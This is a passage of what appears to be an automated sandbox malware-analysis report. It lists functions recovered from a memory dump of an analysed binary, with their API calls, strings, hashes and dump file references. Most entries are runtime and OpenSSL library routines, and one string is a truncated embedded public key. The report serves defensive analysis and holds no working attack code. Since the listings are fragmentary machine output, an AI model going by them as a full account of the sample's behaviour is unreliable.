                                                                                                                                                                                                                                        • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d0e854b80ffd72347278f6bb16eab8531bb2b7fdd0e65446e68d8b4e3059bbe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                                                                                        • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                                                                                                                                                                        • API String ID: 2102423945-3653307630
                                                                                                                                                                                                                                        • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                                                                                                                                                        • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004C5D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __getptd_noexit.LIBCMT ref: 004C5D3D
                                                                                                                                                                                                                                          • Part of subcall function 0042501F: GetLastError.KERNEL32(?,?,0042500D,?,00423F7C,?,0041E6CC,00000000,?,?,?,?,?,004CB3EC,000000FF), ref: 00425021
                                                                                                                                                                                                                                          • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                                                                                                                                                                                                                          • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                                                                                                                                                                                                                          • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                                                                                                                                                                                                                          • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,?,0042500D,?,00423F7C,?,0041E6CC,00000000,?,?,?,?,?,004CB3EC,000000FF), ref: 00425083
                                                                                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 004C5D60
                                                                                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                                                                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                                                                                                                                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                                                                                                                                        • API String ID: 3123740607-798102604
                                                                                                                                                                                                                                        • Opcode ID: f3e83e17f5aa232b289a94e568d891c3d39205db9f4a390e985e8908bc2b14e7
                                                                                                                                                                                                                                        • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3e83e17f5aa232b289a94e568d891c3d39205db9f4a390e985e8908bc2b14e7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _fprintf_memset
                                                                                                                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                                                                                                                                                        • API String ID: 3021507156-3399676524
                                                                                                                                                                                                                                        • Opcode ID: 94dfb7c27158a2beef34522423eef19e150cee21a9b7f22f61f93af6bf886857
                                                                                                                                                                                                                                        • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 94dfb7c27158a2beef34522423eef19e150cee21a9b7f22f61f93af6bf886857
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00419E70 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • p2Q, xrefs: 00419EE2
                                                                                                                                                                                                                                        • -----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzzVYb8CErbW\/pFkhLDyb\\n9IMnMjZ6LXzFZ8VEK4FVwrK, xrefs: 00419EC4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                                                                                        • String ID: -----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzzVYb8CErbW\/pFkhLDyb\\n9IMnMjZ6LXzFZ8VEK4FVwrK$p2Q
                                                                                                                                                                                                                                        • API String ID: 2102423945-914387669
                                                                                                                                                                                                                                        • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                                                                                                        • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004416EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00441726
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 00441734
                                                                                                                                                                                                                                          • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                                                                                                        • _strnlen.LIBCMT ref: 004417BF
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 004417D0
                                                                                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 004417DB
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2168648987-0
                                                                                                                                                                                                                                        • Opcode ID: 7908139a20430730cad8562456387d525164ebbf3441293db37808c2cacb4cfc
                                                                                                                                                                                                                                        • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7908139a20430730cad8562456387d525164ebbf3441293db37808c2cacb4cfc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0043B70B
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005A0000,00000000,00000001,00000000,00000000,00000000,?,00428CF4,00000000,00000000,00000000,00000000,?,00428BE1,00000018,00507BD0), ref: 00420CA5
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043B71E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1020059152-0
                                                                                                                                                                                                                                        • Opcode ID: e293482dd4569b00965346b4f398fb5a8397a6e25ee6de7e175bff95cc096530
                                                                                                                                                                                                                                        • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e293482dd4569b00965346b4f398fb5a8397a6e25ee6de7e175bff95cc096530
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0041F0B6
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                                                                                        • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                                                                                                                                                        • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0041E546
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                                                                                        • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                                                                                                                                                        • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0041FA7B
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                                                                                        • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                                                                                                        • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0041FE2B
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                                                                                        • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                                                                                                        • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                                                                                        • Opcode ID: d9b75942721a8a0ae071e27c76c5a1cf50cff94bf9e533d59e849fe7592e75e1
                                                                                                                                                                                                                                        • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9b75942721a8a0ae071e27c76c5a1cf50cff94bf9e533d59e849fe7592e75e1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004229A9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write
                                                                                                                                                                                                                                        • String ID: A
                                                                                                                                                                                                                                        • API String ID: 3115901604-2078354741
                                                                                                                                                                                                                                        • Opcode ID: c801ac2ca2d43139865efb7dfbd9e243acdf2f1ae776db3811a370f6b9bcd5c2
                                                                                                                                                                                                                                        • Instruction ID: 74c924880168de559db59c14e1a2c39f6381d3f38157317aef41ba5f0430eaff
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c801ac2ca2d43139865efb7dfbd9e243acdf2f1ae776db3811a370f6b9bcd5c2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F041F870700626BFDB289F69EA8056F77A5BF44360B94813FE805C7740D6F8DD818B58
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                                                                                        • API String ID: 4104443479-4289949731
